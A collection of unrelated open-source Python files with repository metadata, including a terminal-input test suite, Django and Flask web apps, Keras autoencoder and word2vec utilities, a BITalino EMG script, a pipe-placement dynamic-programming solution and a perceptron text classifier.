self.assertEqual(key.code(), termkey.TermKeySym.ESCAPE)
@unittest.skipUnless(has_pynput, "Requires pynput (and thus a real input mechanism, like an X server)")
class RealInputTests(InputTests, TestCase):
def setUp(self):
super(InputTests, self).setUp()
self.k = Controller()
def tearDown(self):
super(InputTests, self).tearDown()
def map_key(self, key):
kmap = self.keymap()
if isinstance(key, str):
return key
elif key in kmap:
return kmap[key]
else:
raise Exception('Could not find {} key in keymap'.format(key))
def tap(self, key):
def tap():
mkey = self.map_key(key)
self.k.press(mkey)
self.k.release(mkey)
suppress_deprecation(tap)
self.tk.advisereadable()
def modify_tap(self, key, modifier):
def modify_tap():
mkey = self.map_key(key)
mmod = self.map_key(modifier)
self.k.press(mmod)
self.k.press(mkey)
self.k.release(mkey)
self.k.release(mmod)
suppress_deprecation(modify_tap)
def keymap(self):
return {Keys.CTRL: Key.ctrl, Keys.DEL: Key.backspace, Keys.ESC: Key.esc}
class FakeInputTests(InputTests, TestCase):
def map_key(self, key):
kmap = self.keymap()
if isinstance(key, str):
return bytes(key, 'utf8')
elif key in kmap:
return kmap[key]
else:
raise Exception('Could not find {} key in keymap'.format(key))
def tap(self, key):
mkey = self.map_key(key)
self.tk.push_bytes(mkey)
def modify_tap(self, key, modifier):
if (modifier is Keys.CTRL) and (key is 'c'):
self.tk.push_bytes(bytes.fromhex('03'))
else:
raise Exception('Other modifiers supported in fake input testing')
def keymap(self):
return {Keys.DEL: bytes.fromhex('7F'), Keys.ESC: bytes.fromhex('1b')}
if __name__ == '__main__':
unittest.main()
| [
"michael.vilim@gmail.com"
] | michael.vilim@gmail.com |
17dd662ee4171dcdc0847174ef3082dc8f66cefb | d5c6da7dd1c87b2e9f6ecef51cc4d1c3402f7b8b | /Level2Assignment/manage.py | a4c44a059dd1a7ab32785490e7d4be2de5eafa53 | [] | no_license | JAGASABARIVEL/Django | 85fabf8debf9af54bd7381939f7d77451ce42182 | b3cf50a80e4542aabab66cbdcab70edce0799603 | refs/heads/master | 2022-11-23T23:35:56.079040 | 2019-12-07T16:51:34 | 2019-12-07T16:51:34 | 225,845,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Level2Assignment.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"JAGASABARIVEL@gmail.com"
] | JAGASABARIVEL@gmail.com |
2a3d5be3009d4b609bfbe5cd460ac5966b9737f3 | accf2a28b038b3ca03d3b263739b3b00c7c834b1 | /task_app/task_app/urls.py | 8eefbe6fc8c9c8b133df0f86da5e55ccf1102f36 | [] | no_license | erinrosenbaum/django_task_app_with_crud | 7b7b4aecb8de7f68b6df51b413de5f39c38a1441 | d27fde01e528e93243e48d44264bcf390087cbb9 | refs/heads/master | 2020-04-17T20:20:47.571730 | 2019-01-22T00:53:39 | 2019-01-22T00:53:39 | 166,901,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | """task_app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('tasks/', include('tasks.urls')),
]
| [
"erinrosenbaum@yahoo.com"
] | erinrosenbaum@yahoo.com |
cf2eddc7ea32518b89f8312d10d7054b596f5604 | 70ba0363b5df57df949c516ace000f5f0949af4a | /autoencodercmp/embedding.py | ca450244171a95135754e271d8456ba03a7c3f4c | [
"MIT"
] | permissive | SiyanZhou97/VAE | 41659cc722bb6dc267f22af10231e1173cda1d0b | 6e19f9dc865155f45554a462f4599f7ebc6a40db | refs/heads/master | 2022-11-27T15:14:01.398437 | 2020-08-04T00:10:40 | 2020-08-04T00:10:40 | 273,518,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,875 | py | import numpy as np
import tensorflow as tf
from models import create_lstm_ae, create_binned_lstm_vae, create_lstm_vae
from align_maze import align_maze, align_ITI
from data_generator import DataGenerator
from deviance import deviance
#============================================
# return embedding
#============================================
def ae_embed(bin_training_data,
intermediate_dim,latent_dim,latent_fac,epochs,batch_size):
n_trial, n_bin, n_neuron = bin_training_data.shape
ae, ae_encoder, ae_encoder2 = create_lstm_ae(input_dim=n_neuron, timesteps=n_bin,
intermediate_dim=intermediate_dim,
latent_dim=latent_dim,
latent_fac=latent_fac)
ae.fit(bin_training_data, bin_training_data, epochs=epochs, batch_size=batch_size, verbose=0)
latent_point=ae_encoder.predict(bin_training_data, verbose=0)
latent_trajectory = ae_encoder2.predict(bin_training_data, verbose=0)
return latent_point,latent_trajectory
def vae_binned_embed(bin_training_data,
intermediate_dim,latent_dim,latent_fac,epochs,batch_size):
n_trial, n_bin, n_neuron = bin_training_data.shape
vae_binned, vae_binned_encoder, vae_binned_encoder2 = create_binned_lstm_vae(input_dim=n_neuron, timesteps=n_bin,
intermediate_dim=intermediate_dim, latent_dim=latent_dim,
latent_fac=latent_fac, epsilon_std=1.)
vae_binned.fit(bin_training_data, bin_training_data, epochs=epochs, batch_size=batch_size, verbose=0)
latent_point = vae_binned_encoder.predict(bin_training_data, verbose=0)
latent_trajectory = vae_binned_encoder2.predict(bin_training_data, verbose=0)
return latent_point,latent_trajectory
def vae_embed(nobin_training_data,
intermediate_dim,latent_dim,latent_fac,epochs,batch_size=1):
n_neuron=nobin_training_data[0].shape[-1]
training_generator = DataGenerator(nobin_training_data, nobin_training_data, batch_size=batch_size)
vae, vae_encoder, vae_encoder2 = create_lstm_vae(input_dim=n_neuron, timesteps=None,
intermediate_dim=intermediate_dim, latent_dim=latent_dim,
latent_fac=latent_fac, epsilon_std=1.)
vae.fit_generator(generator=training_generator,
epochs=epochs, verbose=0)
latent_point=[]
latent_trajectory=[]
for i in range(len(nobin_training_data)):
shape1, shape2 = nobin_training_data[i].shape
latent_point.append(vae_encoder.predict(nobin_training_data[i].reshape(1, shape1, shape2), verbose=0))
latent_trajectory.append(vae_encoder2.predict(nobin_training_data[i].reshape(1, shape1, shape2), verbose=0))
return latent_point, latent_trajectory
| [
"noreply@github.com"
] | SiyanZhou97.noreply@github.com |
8a42ff3f0285714a41fc38ccd9bd47a68b007b22 | 94a287b6db759df48d9ed98b9450caabb863e1ac | /nearestPower.py | c058f9f21d4baacda7dfc73f5a76e23b392f044e | [
"MIT"
] | permissive | JanviChitroda24/pythonprogramming | 4341e778aa2e091a0edddcf8d39028336d4bd1b6 | 59fa28aa9b48cea4d6e97bf386e688860bd9aef5 | refs/heads/master | 2023-08-15T11:32:28.358675 | 2021-10-17T12:17:01 | 2021-10-17T12:17:01 | 418,115,525 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | import math
def npow(a,b):
x=round(math.log(b)/math.log(a))
y=x+1
if(abs((a**x)-b)>abs((a**y)-b)):
return a**y
else:
return a**x
p=int(input("Enter your 1st Number:"))
q=int(input("Enter your 2nd Number:"))
print("The Nearest Power is:",npow(p,q))
| [
"noreply@github.com"
] | JanviChitroda24.noreply@github.com |
f614e10f66f919c3deda9664c82532d0b145b14c | bb77a939d49a1d6e789d655aa30dfc5a4bf4f50f | /week-1/detect-capital.py | ee4528e1ac65d3c8f8db21fa4208a56080c120b2 | [] | no_license | johnsanc/wb-cohort3 | 0778eacb908a79c9aca124c7800c5370649b2457 | 8faeb2c3416b19c4e1950abfb11a2c3a5651babf | refs/heads/master | 2020-06-10T04:14:56.489619 | 2019-08-19T05:56:58 | 2019-08-19T05:56:58 | 193,579,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word.isupper():
return True
elif word.islower():
return True
else:
if word[0].isupper() and word[1:].islower():
return True
else:
return False | [
"johnny.ss@icloud.com"
] | johnny.ss@icloud.com |
746adb8e7b81e29709b78b2e40fdb14231dfbbc9 | ec13b507c34d58cfffe1c93d427a7c70ac74158b | /5_Sequence_Model/week2/Word Vector Repressiontation/w2v_utils.py | a78fab1b1c0453b168ee15fbda79f08ad3f51cfd | [] | no_license | xiaoxue11/DL-homework | 2e7cdb3e0eb116c19e3f8226f55c80afd78d82e7 | 4f6505557b8a225b210bfb22531dd5b6c4d79ad8 | refs/heads/master | 2020-06-01T16:01:34.957727 | 2019-06-08T03:47:22 | 2019-06-08T03:47:22 | 190,842,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,082 | py | from keras.models import Model
from keras.layers import Input, Dense, Reshape, merge
from keras.layers.embeddings import Embedding
from keras.preprocessing.sequence import skipgrams
from keras.preprocessing import sequence
import urllib.request # module defines functions and classes which help in opening URLs
import collections
import os
import zipfile
import numpy as np
import tensorflow as tf
window_size = 3
vector_dim = 300
epochs = 1000
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
def maybe_download(filename, url, expected_bytes):
"""Download a file if not present, and make sure it's the right size."""
if not os.path.exists(filename):
filename, _ = urllib.request.urlretrieve(url + filename, filename)
statinfo = os.stat(filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
print(statinfo.st_size)
raise Exception(
'Failed to verify ' + filename + '. Can you get to it with a browser?')
return filename
# Read the data into a list of strings.
def read_data(filename):
"""Extract the first file enclosed in a zip file as a list of words."""
with zipfile.ZipFile(filename) as f:
data = tf.compat.as_str(f.read(f.namelist()[0])).split()
return data
def build_dataset(words, n_words):
"""Process raw inputs into a dataset."""
count = [['UNK', -1]]
count.extend(collections.Counter(words).most_common(n_words - 1))
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary)
data = list()
unk_count = 0
for word in words:
if word in dictionary:
index = dictionary[word]
else:
index = 0 # dictionary['UNK']
unk_count += 1
data.append(index)
count[0][1] = unk_count
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
def collect_data(vocabulary_size=10000):
url = 'http://mattmahoney.net/dc/'
filename = maybe_download('text8.zip', url, 31344016)
vocabulary = read_data(filename)
print(vocabulary[:7])
data, count, dictionary, reverse_dictionary = build_dataset(vocabulary,
vocabulary_size)
del vocabulary # Hint to reduce memory.
return data, count, dictionary, reverse_dictionary
class SimilarityCallback:
def run_sim(self):
for i in range(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
sim = self._get_sim(valid_examples[i])
nearest = (-sim).argsort()[1:top_k + 1]
log_str = 'Nearest to %s:' % valid_word
for k in range(top_k):
close_word = reverse_dictionary[nearest[k]]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
@staticmethod
def _get_sim(valid_word_idx):
sim = np.zeros((vocab_size,))
in_arr1 = np.zeros((1,))
in_arr2 = np.zeros((1,))
in_arr1[0,] = valid_word_idx
for i in range(vocab_size):
in_arr2[0,] = i
out = validation_model.predict_on_batch([in_arr1, in_arr2])
sim[i] = out
return sim
def read_glove_vecs(glove_file):
with open(glove_file, 'r',encoding='UTF-8') as f:
words = set()
word_to_vec_map = {}
for line in f:
line = line.strip().split()
curr_word = line[0]
words.add(curr_word)
word_to_vec_map[curr_word] = np.array(line[1:], dtype=np.float64)
return words, word_to_vec_map
def relu(x):
"""
Compute the relu of x
Arguments:
x -- A scalar or numpy array of any size.
Return:
s -- relu(x)
"""
s = np.maximum(0,x)
return s
def initialize_parameters(vocab_size, n_h):
"""
Arguments:
layer_dims -- python array (list) containing the dimensions of each layer in our network
Returns:
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2":
W1 -- weight matrix of shape (n_h, vocab_size)
b1 -- bias vector of shape (n_h, 1)
W2 -- weight matrix of shape (vocab_size, n_h)
b2 -- bias vector of shape (vocab_size, 1)
"""
np.random.seed(3)
parameters = {}
parameters['W1'] = np.random.randn(n_h, vocab_size) / np.sqrt(vocab_size)
parameters['b1'] = np.zeros((n_h, 1))
parameters['W2'] = np.random.randn(vocab_size, n_h) / np.sqrt(n_h)
parameters['b2'] = np.zeros((vocab_size, 1))
return parameters
def softmax(x):
    """Compute softmax values for each set of scores in x.

    Subtracting the max before exponentiating keeps the computation
    numerically stable without changing the result.
    """
    shifted = np.exp(x - np.max(x))
    return shifted / shifted.sum()
| [
"xuezhang0111@gmail.com"
] | xuezhang0111@gmail.com |
24298090eb5325f13c5cd6ff497fe96f16a5321f | 5c58c55052a717c9fe970f0f1d509273c2560f92 | /app.py | 7f9c2ffacb9332bed936e30b727eb3d7ed34f2d6 | [] | no_license | WiamSalaheldin/flask-task-manager-project | c43ebc2562887db20ad2cd789ef476eafe81f6b6 | 22749feb180506f8ed8329301326dca01a691ef3 | refs/heads/master | 2023-02-10T00:25:21.888196 | 2021-01-12T01:39:02 | 2021-01-12T01:39:02 | 327,696,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,363 | py | import os
from flask import (
Flask, flash, render_template,
redirect, request, session, url_for)
from flask_pymongo import PyMongo
from bson.objectid import ObjectId
from werkzeug.security import generate_password_hash, check_password_hash
if os.path.exists("env.py"):
import env
app = Flask(__name__)
app.config["MONGO_DBNAME"] = os.environ.get("MONGO_DBNAME")
app.config["MONGO_URI"] = os.environ.get("MONGO_URI")
app.secret_key = os.environ.get("SECRET_KEY")
mongo = PyMongo(app)
@app.route("/")
@app.route("/get_tasks")
def get_tasks():
    """Home page: render every task in the collection."""
    tasks = list(mongo.db.tasks.find())
    return render_template("tasks.html", tasks=tasks)
@app.route("/search", methods=["GET", "POST"])
def search():
    """Render the tasks matching the submitted MongoDB $text query."""
    query = request.form.get("query")
    tasks = list(mongo.db.tasks.find({"$text": {"$search": query}}))
    return render_template("tasks.html", tasks=tasks)
@app.route("/register", methods=["GET", "POST"])
def register():
    """Register a new user; GET renders the form, POST creates the account."""
    if request.method == "POST":
        # check if username already exists in db
        existing_user = mongo.db.users.find_one(
            {"username": request.form.get("username").lower()})
        if existing_user:
            # duplicate name: send the user back to this same view to retry
            flash("Username already exists")
            return redirect(url_for("register"))
        # store the username lowercased and only a hash of the password
        register = {
            "username": request.form.get("username").lower(),
            "password": generate_password_hash(request.form.get("password"))
        }
        mongo.db.users.insert_one(register)
        # put the new user into 'session' cookie (logged in immediately)
        session["user"] = request.form.get("username").lower()
        flash("Registration Successful!")
        return redirect(url_for("profile", username=session["user"]))
    return render_template("register.html")
@app.route("/login", methods=["GET", "POST"])
def login():
    """Log an existing user in; GET renders the form, POST authenticates."""
    if request.method == "POST":
        # check if username exists in db
        existing_user = mongo.db.users.find_one(
            {"username": request.form.get("username").lower()})
        if existing_user:
            # ensure hashed password matches user input
            if check_password_hash(
                    existing_user["password"], request.form.get("password")):
                session["user"] = request.form.get("username").lower()
                flash("Welcome, {}".format(
                    request.form.get("username")))
                return redirect(url_for(
                    "profile", username=session["user"]))
            else:
                # wrong password: same generic message as unknown user
                flash("Incorrect Username and/or Password")
                return redirect(url_for("login"))
        else:
            # username doesn't exist
            flash("Incorrect Username and/or Password")
            return redirect(url_for("login"))
    return render_template("login.html")
@app.route("/profile/<username>", methods=["GET", "POST"])
def profile(username):
    """Render the signed-in user's profile page.

    NOTE(review): the <username> URL argument is immediately overwritten
    with the session user's name, so every profile URL shows the viewer's
    own profile — confirm that is intentional.
    """
    # grab the session user's username from db
    username = mongo.db.users.find_one(
        {"username": session["user"]})["username"]
    if session["user"]:
        return render_template("profile.html", username=username)
    return redirect(url_for("login"))
@app.route("/logout")
def logout():
    """Clear the session user and return to the login page."""
    # remove user from session cookie
    flash("You have been logged out")
    session.pop("user")
    return redirect(url_for("login"))
@app.route("/add_task", methods=["GET", "POST"])
def add_task():
    """Create a new task; GET renders the form with the category dropdown."""
    if request.method == "POST":
        # the checkbox is only posted when ticked, so normalise to on/off
        is_urgent = "on" if request.form.get("is_urgent") else "off"
        task = {
            "category_name": request.form.get("category_name"),
            "task_name": request.form.get("task_name"),
            "task_description": request.form.get("task_description"),
            "is_urgent": is_urgent,
            "due_date": request.form.get("due_date"),
            "created_by": session["user"]
        }
        mongo.db.tasks.insert_one(task)
        flash("Task Successfully Added")
        return redirect(url_for("get_tasks"))
    # categories feed the form's <option> dropdown, sorted alphabetically
    categories = mongo.db.categories.find().sort("category_name", 1)
    return render_template("add_task.html", categories=categories)
@app.route("/edit_task/<task_id>", methods=["GET", "POST"])
def edit_task(task_id):
    """Edit an existing task.

    Unlike add_task, a successful POST does not redirect: it falls through
    and re-renders this same edit page with the updated task.
    """
    if request.method == "POST":
        is_urgent = "on" if request.form.get("is_urgent") else "off"
        submit = {
            "category_name": request.form.get("category_name"),
            "task_name": request.form.get("task_name"),
            "task_description": request.form.get("task_description"),
            "is_urgent": is_urgent,
            "due_date": request.form.get("due_date"),
            "created_by": session["user"]
        }
        # replace the task document matched by its ObjectId
        mongo.db.tasks.update({"_id": ObjectId(task_id)}, submit)
        flash("Task Successfully Updated")
    task = mongo.db.tasks.find_one({"_id": ObjectId(task_id)})
    categories = mongo.db.categories.find().sort("category_name", 1)
    # take the user back to the same edit page
    return render_template("edit_task.html", task=task, categories=categories)
@app.route("/delete_task/<task_id>")
def delete_task(task_id):
    """Delete the task with the given id, then go back to the task list."""
    # get the specific task by the ObjectId
    mongo.db.tasks.remove({"_id": ObjectId(task_id)})
    flash("Task Successfully Deleted")
    # redirect the user back to our primary function for the home page
    return redirect(url_for("get_tasks"))
@app.route("/get_categories")
def get_categories():
    """Render all categories sorted alphabetically."""
    categories = list(mongo.db.categories.find().sort("category_name", 1))
    return render_template("categories.html", categories=categories)
@app.route("/add_category", methods=["GET", "POST"])
def add_category():
    """Create a new category; GET renders the form."""
    if request.method == "POST":
        category = {
            "category_name": request.form.get("category_name")
        }
        mongo.db.categories.insert_one(category)
        flash("New Category Added")
        return redirect(url_for("get_categories"))
    return render_template("add_category.html")
@app.route("/edit_category/<category_id>", methods=["GET", "POST"])
def edit_category(category_id):
    """Rename an existing category; GET renders the pre-filled form."""
    if request.method == "POST":
        submit = {
            "category_name": request.form.get("category_name")
        }
        # replace the category document matched by its ObjectId
        mongo.db.categories.update({"_id": ObjectId(category_id)}, submit)
        flash("Category Successfully Updated")
        return redirect(url_for("get_categories"))
    category = mongo.db.categories.find_one({"_id": ObjectId(category_id)})
    return render_template("edit_category.html", category=category)
@app.route("/delete_category/<category_id>")
def delete_category(category_id):
    """Delete the category with the given id, then return to the list."""
    mongo.db.categories.remove({"_id": ObjectId(category_id)})
    flash("Category Successfully Deleted")
    return redirect(url_for("get_categories"))
if __name__ == "__main__":
    # Host and port come from the environment (IP / PORT); debug=True is
    # for development only and must be disabled before deployment.
    app.run(host=os.environ.get("IP"),
            port=int(os.environ.get("PORT")),
            debug=True)
"wiam.khairelsid@gmail.com"
] | wiam.khairelsid@gmail.com |
7c2557ffe34bf638b0ba6748b94a2d486ac85968 | ed709beb4ae2ae335f5d99f04cd122fac6c35d88 | /CODE/PYTHON/project.py | a37b95bacc71262a588283f99bc23571aa5a6c00 | [] | no_license | manuelrocha88/CherryPickISEPBITalinoPyExample | d4f9a867e00bd26d3ee319ee2dfbf23d63bc19bc | 6e7488672800021f2fdd36317ac18faf835b1183 | refs/heads/master | 2021-01-09T20:46:38.075698 | 2016-05-27T21:22:33 | 2016-05-27T21:22:33 | 59,861,818 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,078 | py | import numpy
#Set bitalino Library. Can get it from github:
#https://github.com/BITalinoWorld/python-api ( http://bit.ly/BITalinoPyAPI )
import bitalino
#Set BITalino Mac Address
#macAddress = "20-15-12-22-97-57";
#If you have Apple Operating System Mac OS
#you have to use the virtual port instead
#run terminal command ls /dev/tty.*
#in order to check what is the
macAddress = "/dev/tty.BITalino-97-57-DevB"
# Instantiate the board connection (Bluetooth MAC or virtual serial port).
device = bitalino.BITalino(macAddress)
# Read BITalino version
BITversion = device.version()
print "BITalino Version: ", BITversion
# Check if we are using version 1 or 2 of BITalino board
print "BITalino type: ", "2" if device.isBitalino2 else "1"
# Start acquisition (sampling rate 1000, channel list [1]).
device.start(1000,[1])
i = 0
# Read 100-sample blocks for 100 iterations; Ctrl-C stops early.
while i<100:
    try:
        dataAcquired = device.read(100)
        # last row of the block is the sampled analog channel —
        # presumably the EMG signal; confirm against channel wiring.
        EMG = dataAcquired[-1, :]
        # mean absolute deviation of the samples = activity level
        value = numpy.mean(abs(EMG - numpy.mean(EMG)))
        print "v = ", value
        # drive the second digital output high while activity > threshold
        if value > 150:
            device.trigger([0, 1])
        else:
            device.trigger([0, 0])
        i = i + 1
    except KeyboardInterrupt:
        break
device.close()
| [
"manuelrocha@manuelrocha.biz"
] | manuelrocha@manuelrocha.biz |
bfc39fecb86f2ae5c3caa848912510a68060bef6 | 18b7f6e6a64ff4e33202f4c647d33240bf8ce015 | /_AlgoStudy/20_0912/Baek_17070_3.py | 0c0a74e9fdd2d16d022ff6376f9d14404a65ade5 | [] | no_license | qorjiwon/LevelUp-Algorithm | 80734b88e2543fb4b6da48377bb31b70d972b448 | 62a71552427290361e6ade9dcfe3ffc90a9d86e2 | refs/heads/master | 2023-06-16T16:33:44.427818 | 2021-03-12T14:39:25 | 2021-03-12T14:39:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,938 | py | from sys import stdin
input = stdin.readline
# . → ↓ ↘
p_dirs = [[0, 1], [1, 0], [1, 1]]
ans = 0
from itertools import combinations
combinations()
def solution(y, x, p_type):
    """Exhaustive DFS used for small boards (N <= 15).

    (y, x) is the head cell of the currently placed pipe and p_type its
    orientation: 0 = → (horizontal), 1 = ↓ (vertical), 2 = ↘ (diagonal).
    Increments the global `ans` each time the head reaches (N-1, N-1).
    Reads the globals N, MAP and p_dirs defined at module level.
    """
    global ans
    if y == N - 1 and x == N - 1:
        ans += 1
        return
    # O(V*V) -> O(V*V*3^V)
    for i, dirs in enumerate(p_dirs):
        # (horizontal -> vertical) or (vertical -> horizontal) directly
        # is not allowed; only the diagonal connects the two.
        if (i == 0 and p_type == 1) or (i == 1 and p_type == 0):
            continue
        # next pipe head (out of range or blocked by a wall)
        next_y = y + dirs[0]; next_x = x + dirs[1]
        if next_y >= N or next_x >= N or MAP[next_y][next_x] == 1:
            continue
        # a diagonal pipe also needs both flanking cells to be empty
        if i == 2 and (MAP[y][x + 1] == 1 or MAP[y + 1][x] == 1):
            continue
        solution(next_y, next_x, i)
def solution_2():
    """Bottom-up DP used for large boards.

    dp[t][r][c] counts the ways a pipe of orientation t can end at (r, c),
    with t indexed as in the comment below.  Reads/writes the module-level
    globals dp, MAP and N.
    """
    # 0. → 1. ↘ 2. ↓
    dp[0][0][1] = 1
    # first row: only horizontal moves are possible
    for i in range(2, N):
        if MAP[0][i] == 0:
            dp[0][0][i] = dp[0][0][i-1]
    for r in range(1, N):
        for c in range(1, N):
            # a diagonal needs its own cell plus both flanking cells free
            if MAP[r][c] == 0 and MAP[r][c-1] == 0 and MAP[r-1][c] == 0:
                # ↘ = [previous →] + [previous ↘] + [previous ↓]
                dp[1][r][c] = dp[0][r-1][c-1] + dp[1][r-1][c-1] + dp[2][r-1][c-1]
            if MAP[r][c] == 0:
                # → = [previous →] + [previous ↘]
                dp[0][r][c] = dp[0][r][c-1] + dp[1][r][c-1]
                # ↓ = [previous ↓] + [previous ↘]
                dp[2][r][c] = dp[2][r-1][c] + dp[1][r-1][c]
# Read the board size and the N x N grid (1 = wall, 0 = empty).
N = int(input())
MAP = [list(map(int, input().split())) for _ in range(N)]
# Small boards: exhaustive DFS is fast enough; otherwise use the O(N^2) DP.
if N <= 15:
    solution(0, 1, 0)
    print(ans)
else:
    dp = [[[0 for _ in range(N)] for _ in range(N)] for _ in range(3)]
    solution_2()
    # total = ways ending at (N-1, N-1) in any of the three orientations
    print(sum(dp[i][N-1][N-1] for i in range(3)))
"""
3
0 0 0
0 0 0
0 0 0
>
1
-------
4
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
>
3
""" | [
"21300035@handong.edu"
] | 21300035@handong.edu |
8c780606da24a7c15997a8036133511821b2f6bd | 231a05a0829d5407cf0fbbed81f92099239a5091 | /二分类/PLA.py | eafff36e71eb183b54219fcda61cc81c9edf0654 | [] | no_license | shiji203/Classification-and-Regression-Task | 3491474fe7cdf6f99e4bd40a41411848b69fb7e2 | 7090e6af850e443d5a309a1a6f2717fdab47323d | refs/heads/master | 2021-05-25T17:18:09.180721 | 2019-03-10T14:21:45 | 2019-03-10T14:21:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,919 | py | import numpy as np
import math
import csv
from pprint import pprint
def main():
    """Train a perceptron (PLA) text classifier on bag-of-words features
    and report accuracy on a validation split.

    All file paths are hard-coded relative to the working directory; each
    input line is one whitespace-tokenised sentence, and each label file
    holds one 0/1 label per line.
    """
    file_name1 = '2/my_train.txt'
    with open(file_name1, 'r', encoding='utf-8') as file1:
        file1_list = file1.readlines()
    train_size = len(file1_list)
    train_list = []
    weights = {}
    # Every token ever seen in training starts with weight 1.
    for i in range(train_size):
        tmp = file1_list[i].split()
        for tmp1 in tmp:
            weights[tmp1] = 1
        train_list.append(tmp)
    file_name3 = '2/my_train_label.txt'
    with open(file_name3, 'r', encoding='utf-8') as file3:
        label_list = file3.readlines()
    cycles = 15  # number of training iterations (epochs)
    alpha = 1.0  # learning rate
    for j in range(cycles):
        correct_num = 0
        print(j+1)
        # Decay the learning rate as training progresses.
        # NOTE(review): this divides the *current* alpha by (j+1), so the
        # rate shrinks factorially (1, 1/2, 1/6, ...) rather than as
        # 1/(j+1) — confirm this aggressive decay is intended.
        alpha = alpha/(j+1)
        for i in range(train_size):
            tmp_list = train_list[i][:]
            y = 0.0
            # Score the sentence: sum the weight of every token in it.
            for k in tmp_list:
                y += (weights[k] * 1)
            # Predict 1 when the score is >= 0, otherwise predict 0.
            if y >= 0.0:
                sign_y = 1.0
            else:
                sign_y = 0.0
            # Correct prediction: leave the weights untouched.
            if sign_y == float(label_list[i]):
                correct_num += 1
                continue
            # Wrong prediction: update the weights.
            else:
                # Push weights up for label 1, down for label 0.
                if float(label_list[i]) == 1.0:
                    e = 1.0
                else:
                    e = -1.0
                # Apply the perceptron update to every token of the sentence.
                for k in tmp_list:
                    weights[k] = weights[k] + e*alpha
        # training accuracy for this epoch
        print(float(correct_num) / train_size)
    file_name3 = '2/my_validation_label.txt'
    with open(file_name3, 'r', encoding='utf-8') as file3:
        label_list1 = file3.readlines()
    file_name2 = '2/my_validation.txt'
    with open(file_name2, 'r', encoding='utf-8') as file2:
        file2_list = file2.readlines()
    test_size = len(file2_list)
    test_list = []
    for i in range(test_size):
        tmp = file2_list[i].split()
        test_list.append(tmp)
    accurate_number = 0
    # Score every validation sentence with the learned weights.
    for i in range(test_size):
        tmp_list = test_list[i][:]
        test_y = 0.0
        # Tokens never seen in training contribute nothing to the score.
        for k in tmp_list:
            if k in weights.keys():
                test_y += weights[k] * 1
        # Same decision rule as in training: score >= 0 means class 1.
        if test_y >= 0.0:
            sign_y = 1.0
        else:
            sign_y = 0.0
        if sign_y == float(label_list1[i]):
            accurate_number += 1
    print('Accuracy: ', str(float(accurate_number) / test_size))
if __name__ == "__main__":
main() | [
"1240945617@qq.com"
] | 1240945617@qq.com |
046ef434c325e090530784b9fadaaf68e9ea6f7e | cbfad345940367c7f35e508dd973fbf98230c356 | /blog/views.py | 78436afd963e8072a0d0d731f6d2e41886eaf77e | [] | no_license | HugoPHAM/my-first-blog | e84455d72eca612b1060b0cab6c808151a6f3301 | 2bcc588d44ad70177d650e1b991572c1de089652 | refs/heads/master | 2021-03-27T12:07:56.664634 | 2017-07-06T20:38:58 | 2017-07-06T20:38:58 | 95,473,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from .models import Post, PostForm
# Create your views here.
def post_list(request):
    """Render all already-published posts, oldest first."""
    posts = Post.objects.filter(published_date__lte = timezone.now()).order_by('published_date')
    return render(request, 'blog/post_list.html', {'posts':posts})
def post_detail(request, pk):
    """Render a single post; responds 404 when the pk does not exist."""
    post = get_object_or_404(Post, pk = pk)
    return render(request, 'blog/post_detail.html', {'post': post})
def post_new(request):
    """Create a new post: empty form on GET, save and redirect on valid POST.

    An invalid POST falls through and re-renders the bound form with errors.
    """
    if request.method == "POST":
        form = PostForm(request.POST)
        if form.is_valid():
            # save without committing so author/date can be filled in first
            post = form.save(commit=False)
            post.author = request.user
            post.published_date = timezone.now()
            post.save()
            return redirect('post_detail', pk=post.pk)
    else:
        form = PostForm()
    return render(request, 'blog/post_edit.html', {'form': form})
def post_edit(request, pk):
    """Edit an existing post, pre-filling the form from the instance.

    Saving re-stamps published_date and author; an invalid POST falls
    through and re-renders the bound form with errors.
    """
    post = get_object_or_404(Post, pk=pk)
    if request.method == "POST":
        form = PostForm(request.POST, instance=post)
        if form.is_valid():
            post = form.save(commit=False)
            post.author = request.user
            post.published_date = timezone.now()
            post.save()
            return redirect('post_detail', pk=post.pk)
    else:
        form = PostForm(instance=post)
    return render(request, 'blog/post_edit.html', {'form': form})
"hoanghung_inpg@yahoo.com"
